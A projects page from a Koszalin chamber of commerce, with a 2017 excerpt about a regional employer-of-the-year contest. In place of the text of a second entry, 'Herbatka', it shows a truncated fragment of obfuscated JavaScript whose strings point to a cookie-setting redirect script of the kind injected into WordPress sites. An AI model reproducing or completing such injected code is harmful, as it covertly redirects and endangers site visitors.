Projekty | Północna Izba Gospodarcza w Koszalinie

Projekty

Konkurs Pracodawca Roku Pomorza Środkowego

Koszalin, dnia 2 czerwca 2017 r. Szanowni Państwo, Środkowopomorski rynek pracy w ostatnich latach silnie ewoluował, na co wpływ miały lokalne inwestycje zagraniczne, ujemna demografia, a także odpływ specjalistów za granicę i do innych ośrodków miejskich. W regionie zaczęło brakować nie tylko specjalistów i rzemieślników, ale również pracowników biurowych, produkcyjnych i fizycznych. W rezultacie, zarządzanie zasobami ludzkimi, a zwłaszcza rekrutacja, utrzymanie i rozwój kadr, stały się dziś głównymi bolączkami pracodawców, […]

czytaj dalej

Herbatka Północnej Izby Gospodarczej

'toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','http://','getElementById','wpadminbar','undefined','setTime','getTime',';\x20expires='];(function(c,d){var...

czytaj dalej